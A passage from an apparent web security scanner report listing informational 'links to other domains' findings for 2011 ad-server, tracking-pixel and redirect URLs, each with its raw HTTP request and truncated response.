<td valign="top" colspan="3" class="css9996"><iframe src="https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="150" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe>
...[SNIP]...

15.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632?

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/lmb_lre_PassStIreneThumbCNP15s40k_PresRed_729Pres12_0511_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:55:05 GMT
Expires: Wed, 06 Jul 2011 11:55:05 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
JCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076"><img src="http://s0.2mdn.net/1420759/lmb_lre_PassStIreneThumbCNP15s40k_PresRed_729Pres12_0511_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

15.4. http://ad.doubleclick.net/adj/bzj.techflash/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/bzj.techflash/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=but1;sz=125x125;tile=3;kw=seattle;ord=1309960845.184903.8040?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2256299/SU-White-Tile.gif

Request

GET /adj/bzj.techflash/;beh=;pos=but1;sz=125x125;tile=3;kw=seattle;ord=1309960845.184903.8040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 347
Date: Wed, 06 Jul 2011 14:00:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/y;242904168;0-0;1;40588219;3-125/125;42781672/42799459/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.seattleu.edu/scieng/comsci/Default.aspx?id=59018"><img src="http://s0.2mdn.net/viewad/2256299/SU-White-Tile.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.5. http://ad.doubleclick.net/adj/bzj.techflash/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/bzj.techflash/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=but2;sz=125x125;tile=4;kw=seattle;ord=1309960845.184903.8040?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2671922/BDO-100yrs.gif

Request

GET /adj/bzj.techflash/;beh=;pos=but2;sz=125x125;tile=4;kw=seattle;ord=1309960845.184903.8040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 311
Date: Wed, 06 Jul 2011 14:00:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/b;237741487;0-0;1;40588219;3-125/125;36236341/36254219/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.bdo.com/library"><img src="http://s0.2mdn.net/viewad/2671922/BDO-100yrs.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.6. http://ad.doubleclick.net/adj/bzj.techflash/home_page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/bzj.techflash/home_page

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=but1;vs=commercial;sz=125x125;tile=3;kw=seattle;ord=1309960820.391379.6605?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2256299/SU-White-Tile.gif

Request

GET /adj/bzj.techflash/home_page;beh=;pos=but1;vs=commercial;sz=125x125;tile=3;kw=seattle;ord=1309960820.391379.6605? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 347
Date: Wed, 06 Jul 2011 14:00:24 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/d;242904168;0-0;1;40588225;3-125/125;42781672/42799459/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.seattleu.edu/scieng/comsci/Default.aspx?id=59018"><img src="http://s0.2mdn.net/viewad/2256299/SU-White-Tile.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.7. http://ad.doubleclick.net/adj/bzj.techflash/home_page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/bzj.techflash/home_page

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=but2;vs=commercial;sz=125x125;tile=4;kw=seattle;ord=1309960820.391379.6605?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2671922/BDO-100yrs.gif

Request

GET /adj/bzj.techflash/home_page;beh=;pos=but2;vs=commercial;sz=125x125;tile=4;kw=seattle;ord=1309960820.391379.6605? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 311
Date: Wed, 06 Jul 2011 14:00:24 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/g;237741487;0-0;1;40588225;3-125/125;36236341/36254219/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.bdo.com/library"><img src="http://s0.2mdn.net/viewad/2671922/BDO-100yrs.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.8. http://adonmax.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adonmax.com
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://adonmax.com/afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com

The response contains the following link to another domain:

http://gevalia.com/

Request

Response

15.9. http://bcp.crwdcntrl.net/px previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/px

Issue detail

The page was loaded from a URL containing a query string:

http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4

The response contains the following links to other domains:

http://ads.adbrite.com/adserver/behavioral-data/8203?d=2723
http://ib.adnxs.com/seg?add=105966
http://osmdcs.interclick.com/pixel.aspx?dp=10E0B42F-121D-41E0-A8C4-A5963CAEC3B7&sid=2716
http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1
http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1
http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment
http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js
http://segments.adap.tv/data/?p=lotame&type=gif&audid=2723&add=true
http://segments.adap.tv/data/?p=lotame&type=gif&audid=5606&add=true
https://ad.yieldmanager.com/pixel?id=1170133&t=2

Request

GET /px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4 HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nC2STSgEcRjG%2F8KmbWZndtqZETdx1aacuXBAuzeKC0VOyldYp3FyEBcXxYGkpNxcfLSiFptyIeUsHLeURMR6fvYwv57363n%2Fb2uMMZlUR9aYivRPc37UjBnjNpi%2FX9AtJN5RPYLbJFi35D7JtRN8EOw7Ib5PyYsQZgnuCP4Qahs1KDjfBDeEFH7xNdrHMRrG6AOVE7w0wVJkorL7F7lJ8N83I1TXUbnKnou8iJw7i5GFmsD9ETUnxGxK2rAdkZ%2FLns4KlRnA6bwpVB9qmnYu6PaDAU7wJphlhnEeJycH%2F4mSZ4LzBEtSSe4ZsGdNC6e7obIT200h0Ys6pf2CvldGF%2Bi7R52rxDui8opgkfYiuWshiJiygF8jK%2FEU%2F1CwK1EM8wrMPAHsEixRWU%2FllmAlULs4rHMeHu3EeJGPqhLCPPe8ZE%2BOFR7TfoBDK8E9obZLiPPHTJ6VP7%2FnjlOd; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FEVf%2F%2F4ezrzAwMBr819uXDhJjEBb4tpuFgeEsA8N%2FEFcSQjNaTM%2F4zwhkfFkZAuY3MDAJfNtPrMI9RClkEfi2jVgTtxOnUFDFkDirBRXziFQoOZVIqyWnE6twGrG%2BvkKcG4X5u4k18QKxCi8Rq%2FAUcW6Uz2si1sRDxClMqKgjzuqEinriFDI4CX6fzczAoARUwsgI1cII1QISUAo7k41sVANYntGiAaL%2BC4QfqOLEDFfEaIkqqbXHFLdkWlUAyPjp6QhrwS5NhyiCiIedqcBtgsz%2FI%2FgkTyO7HhgAYNeDAgJsfAbE9dG4TQg7UwAyoQEtKFEV%2Be8qIBxIWnsUcFsj%2BL2NGW4NumSgSgxhX8iaXWRDRCA0QuEmQSIUSRMwDTCCI1hOvxy3swJ495FlqPeXEnwJQga3ZOAiZrJs1NojgdtQhf3N%2BJwjSjh0ueobyHKWm%2FU5vNnLP38vXnmF%2Fe24Xe5mfRa3pPeXdHySabgl5Qy34JYUVrPE62DvL%2Fl45YXV8JQGQdVM2HIBpLxSTP5OOJP5568jnF3DhDPwpZU3eCQ38BNOK27WC%2FHF2SLckqE9M%2FHpXI2nmBKuxC3pn3%2BUcMi5WW%2FHZ8Jh3JLxLLvxOawAt2Si5TnCpb%2F8DD7CURqoIoU32cWz7CEccWGqlYTDKfW%2BLGE3K1zCE15eL66DTciAmIDuFkhq52qdRFaBE6iihKdwVVHGLam4rI6w72X%2B7yemQtXGGxleL27gzuZeL27hlgQA%2FDTnsA%3D%3D; OAID=aa8272d1805895ab786afc266fb574e9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:22:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1170
Connection: close

<html><body><div><img src="https://ad.yieldmanager.com/pixel?id=1170133&t=2" width="1" height="1" /><img src="http://ads.adbrite.com/adserver/behavioral-data/8203?d=2723" width="1" height="1"><iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1"> </iframe>

<img src="http://ib.adnxs.com/seg?add=105966">
<img src="http://segments.adap.tv/data/?p=lotame&type=gif&audid=5606&add=true">

<script src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment" width="1" height="1" />
</noscript>
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=10E0B42F-121D-41E0-A8C4-A5963CAEC3B7&sid=2716">
<img src="http://segments.adap.tv/data/?p=lotame&type=gif&audid=2723&add=true">
<iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1"> </iframe>
...[SNIP]...

15.10. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99012352

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?pixid=99012352 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Wed, 06 Jul 2011 15:39:03 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1">here</a>
...[SNIP]...

15.11. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=audsci

The response contains the following link to another domain:

http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:00:51 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1">here</A>
...[SNIP]...

15.12. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=appnexus1

The response contains the following link to another domain:

http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1">here</A>
...[SNIP]...

15.13. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page was loaded from a URL containing a query string:

http://digg.com/submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1
http://cdn1.diggstatic.com/img/favicon.a015f25c.ico
http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/css/two_column/library/global.5efc6eff.css
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn4.diggstatic.com/css/two_column/App_Submission/index.53cd0655.css
http://www.surveymonkey.com/s/ZNBQMYJ

Request

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/two_column/library/global.5efc6eff.css" media="all">


<link rel="stylesheet" type="text/css" href="http://cdn4.diggstatic.com/css/two_column/App_Submission/index.53cd0655.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

15.14. http://go.microsoft.com/fwlink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The page was loaded from a URL containing a query string:

http://go.microsoft.com/fwlink/?LinkId=209578

The response contains the following link to another domain:

http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_HP_US_BL_BuyMS

Request

GET /fwlink/?LinkId=209578 HTTP/1.1
Host: go.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:24 GMT
Location: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_HP_US_BL_BuyMS
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:21:23 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_HP_US_BL_BuyMS">here</a>.</h2>
</body></html>

15.15. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/acunetix_reports/reports/addthiscom/dom-based-xss-reflected-cross-site-scripting-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dperformersoft.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNE9qEkJPtaPJddJXIdWXI6rd1BPFQ

Request

